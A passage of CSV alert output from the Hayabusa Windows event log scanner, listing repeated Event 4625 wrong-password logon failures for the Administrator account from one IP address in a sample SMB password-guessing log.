+09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KsOJDxDiZSjoBj6F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uH0bQ9zEi1xcfHn3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3AfNT0p4JC1VEfDd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S7T8R8U1WVHZQrYk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kamexpa7isWT8gLC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8CyHFKVcdTo0Upx3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U30aMcZuBD08GWK1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4mihftSCNCYdlBny : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K2wa0xwK6tnurGJQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0V3TbNrKEnrDcEYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T73JW9JURm8Br6MA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OAleyg3h8aMvVVJk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1LQllnWZFUIWa6rw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlwPxSGUmvYH0rpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VrI56o5TyeO48rQV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CKRMn75tv5Yi5rYK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MbJvec7rVisJ6WCC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xoubp5WTPqblBaps : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBczkR92cKY41icQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfUx3OizEb1LiOzj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SRaSOLOWhBEr0qkz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YnlI8Zh4td5m1fpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wXUDXDa4wi3HivKo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TT7iOtVMFcEysCcI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1NJpI7KC3gj99aWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H39cv9JEuLEjlp93 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4p9h1cjLeUzppSZb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E0fOpi4vr55QmO6x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GiKI4V6kpkY5zc9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dLmu4n9qZdf3Q5zo : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 87iJdX2E0ZJintvr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nxc4iIHP0kdqQNiG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RJIWekwBwcIUWjD1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GdnvboiIDzXTZ8MR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QGMPHNpljTlMYeet : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWo4uVFtAbe4IjKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YAPdDqbMY4rYiuZ3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ai2WCQ3MkWwSeOy9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ey1wbsD7w3fs02xP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sVGzidwZICNfLizg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8zjGPMJ6RBw48Ejx : IP Address: 192.168.198.149 : AuthPackage: 
